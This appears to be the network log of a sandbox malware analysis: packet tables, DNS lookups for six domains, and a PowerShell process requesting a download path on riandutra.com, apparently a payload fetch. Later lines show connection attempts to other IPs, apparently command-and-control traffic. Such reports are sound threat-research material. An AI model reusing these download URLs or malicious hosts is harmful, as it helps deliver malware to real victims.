Feb 11, 2021 10:32:49.900635958 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900659084 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900672913 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900681973 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900716066 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900718927 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900744915 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900768042 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900779009 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900790930 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900814056 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900827885 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900835991 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900860071 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900872946 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900883913 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900908947 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900922060 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900933027 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900954008 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900969982 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900978088 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901002884 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901017904 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.901026964 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901063919 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.901565075 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901647091 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901690006 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901709080 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.901715040 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901740074 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901755095 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.901762009 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901786089 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901799917 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.901808023 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901834965 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901849985 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.901859045 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901884079 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901906967 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901916027 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.901931047 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901941061 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.901953936 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901978016 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.901999950 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.902000904 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.902039051 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.902196884 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179203033 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179275990 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179313898 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179353952 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179374933 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179420948 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179425955 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179470062 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179506063 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179528952 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179590940 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179615974 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179627895 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179630995 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179646969 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179662943 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179666996 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179678917 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179693937 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179696083 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179709911 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179728031 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179730892 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179744959 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179759979 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179769993 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179776907 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179794073 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179795027 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179809093 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179825068 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179831028 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179841042 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179860115 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179860115 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179877043 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179892063 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179892063 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179908037 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179923058 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179927111 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179939032 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179954052 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179958105 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.179970026 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179989100 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.179992914 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.180005074 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180020094 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180022001 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.180032015 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180047989 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180049896 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.180067062 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180080891 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.180084944 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180100918 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180116892 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180119991 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.180134058 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180149078 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180155039 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.180164099 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180180073 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180181980 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.180198908 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180213928 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.180217028 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180232048 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180247068 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.180272102 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.180283070 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.181241989 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.384273052 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.384295940 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.384308100 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.384324074 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.384335995 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.384351969 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.384371042 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.384372950 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.384388924 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.384394884 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.384404898 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.384421110 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.384424925 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.384454966 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385204077 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385276079 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385324001 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385349035 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385436058 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385481119 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385508060 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385555029 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385570049 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385586023 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385596037 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385603905 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385617018 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385628939 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385633945 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385641098 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385653973 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385658979 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385665894 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385678053 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385685921 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385690928 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385703087 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385704041 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385715961 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385727882 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385740042 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385745049 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385751963 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385763884 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385775089 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385795116 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385802031 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385812044 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385823965 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385835886 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385845900 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385848045 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385860920 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385870934 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385876894 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385889053 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385895967 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385907888 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385920048 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385921955 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385931969 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385941982 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385943890 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385957003 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385970116 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.385977030 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.385982037 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.386004925 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.386018991 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.386049032 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588460922 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588524103 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588557959 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588593006 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588624954 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588634968 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588643074 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588696003 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588742971 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588751078 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588761091 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588773012 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588785887 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588798046 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588802099 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588813066 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588829994 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588830948 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588844061 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588846922 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588855982 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588867903 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588880062 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588887930 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588892937 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588905096 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588908911 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588917971 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588929892 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588936090 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588948011 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588962078 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588962078 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588974953 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588987112 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.588994980 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.588999987 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589011908 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589025021 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589029074 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.589036942 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589049101 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589061022 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589063883 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.589077950 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589092016 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.589092970 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589112997 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589118958 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.589129925 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589142084 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589154959 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589157104 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.589167118 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589175940 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:50.589180946 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.589212894 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.590284109 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:50.919133902 CET	49165	80	192.168.2.22	191.6.196.95
Feb 11, 2021 10:32:50.919176102 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:33:58.195651054 CET	49175	80	192.168.2.22	84.232.229.24
Feb 11, 2021 10:34:01.209212065 CET	49175	80	192.168.2.22	84.232.229.24
Feb 11, 2021 10:34:09.027523041 CET	49176	8080	192.168.2.22	51.255.203.164
Feb 11, 2021 10:34:12.036451101 CET	49176	8080	192.168.2.22	51.255.203.164
Feb 11, 2021 10:34:18.043026924 CET	49176	8080	192.168.2.22	51.255.203.164

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 11, 2021 10:32:19.080176115 CET	52197	53	192.168.2.22	8.8.8.8
Feb 11, 2021 10:32:19.580894947 CET	53	52197	8.8.8.8	192.168.2.22
Feb 11, 2021 10:32:20.155049086 CET	53099	53	192.168.2.22	8.8.8.8
Feb 11, 2021 10:32:20.497942924 CET	53	53099	8.8.8.8	192.168.2.22
Feb 11, 2021 10:32:41.541214943 CET	52838	53	192.168.2.22	8.8.8.8
Feb 11, 2021 10:32:42.012201071 CET	53	52838	8.8.8.8	192.168.2.22
Feb 11, 2021 10:32:43.043381929 CET	61200	53	192.168.2.22	8.8.8.8
Feb 11, 2021 10:32:43.218600988 CET	53	61200	8.8.8.8	192.168.2.22
Feb 11, 2021 10:32:43.222873926 CET	49548	53	192.168.2.22	8.8.8.8
Feb 11, 2021 10:32:43.288033009 CET	53	49548	8.8.8.8	192.168.2.22
Feb 11, 2021 10:32:43.805707932 CET	55627	53	192.168.2.22	8.8.8.8
Feb 11, 2021 10:32:43.854567051 CET	53	55627	8.8.8.8	192.168.2.22
Feb 11, 2021 10:32:43.860831976 CET	56009	53	192.168.2.22	8.8.8.8
Feb 11, 2021 10:32:43.912437916 CET	53	56009	8.8.8.8	192.168.2.22
Feb 11, 2021 10:32:44.860099077 CET	61865	53	192.168.2.22	8.8.8.8
Feb 11, 2021 10:32:45.066267014 CET	53	61865	8.8.8.8	192.168.2.22
Feb 11, 2021 10:32:46.079530001 CET	55171	53	192.168.2.22	8.8.8.8
Feb 11, 2021 10:32:46.243243933 CET	53	55171	8.8.8.8	192.168.2.22
Feb 11, 2021 10:32:47.053126097 CET	52496	53	192.168.2.22	8.8.8.8
Feb 11, 2021 10:32:47.123756886 CET	53	52496	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 11, 2021 10:32:19.080176115 CET	192.168.2.22	8.8.8.8	0x1168	Standard query (0)	riandutra.com	A (IP address)	IN (0x0001)
Feb 11, 2021 10:32:20.155049086 CET	192.168.2.22	8.8.8.8	0xc896	Standard query (0)	calledtochange.org	A (IP address)	IN (0x0001)
Feb 11, 2021 10:32:41.541214943 CET	192.168.2.22	8.8.8.8	0x2c09	Standard query (0)	mrveggy.com	A (IP address)	IN (0x0001)
Feb 11, 2021 10:32:44.860099077 CET	192.168.2.22	8.8.8.8	0x1b8a	Standard query (0)	norailya.com	A (IP address)	IN (0x0001)
Feb 11, 2021 10:32:46.079530001 CET	192.168.2.22	8.8.8.8	0x8c19	Standard query (0)	hbprivileged.com	A (IP address)	IN (0x0001)
Feb 11, 2021 10:32:47.053126097 CET	192.168.2.22	8.8.8.8	0xdfb5	Standard query (0)	ummahstars.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 11, 2021 10:32:19.580894947 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	riandutra.com	191.6.196.95	A (IP address)	IN (0x0001)
Feb 11, 2021 10:32:20.497942924 CET	8.8.8.8	192.168.2.22	0xc896	No error (0)	calledtochange.org	75.103.81.81	A (IP address)	IN (0x0001)
Feb 11, 2021 10:32:42.012201071 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	mrveggy.com	177.12.170.95	A (IP address)	IN (0x0001)
Feb 11, 2021 10:32:45.066267014 CET	8.8.8.8	192.168.2.22	0x1b8a	No error (0)	norailya.com	104.168.154.203	A (IP address)	IN (0x0001)
Feb 11, 2021 10:32:46.243243933 CET	8.8.8.8	192.168.2.22	0x8c19	No error (0)	hbprivileged.com	35.209.96.32	A (IP address)	IN (0x0001)
Feb 11, 2021 10:32:47.123756886 CET	8.8.8.8	192.168.2.22	0xdfb5	No error (0)	ummahstars.com	35.163.191.195	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

riandutra.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	191.6.196.95	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Feb 11, 2021 10:32:19.852366924 CET	0	OUT	GET /email/AfhE8z0/ HTTP/1.1 Host: riandutra.com Connection: Keep-Alive
Feb 11, 2021 10:32:20.130131960 CET	1	IN	HTTP/1.1 403 Forbidden Date: Thu, 11 Feb 2021 09:32:19 GMT Server: Apache Content-Length: 404 Keep-Alive: timeout=5, max=500 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 65 6d 61 69 6c 2f 41 66 68 45 38 7a 30 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /email/AfhE8z0/on this server.<br />Server unable to read htaccess file, denying access to be safe</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
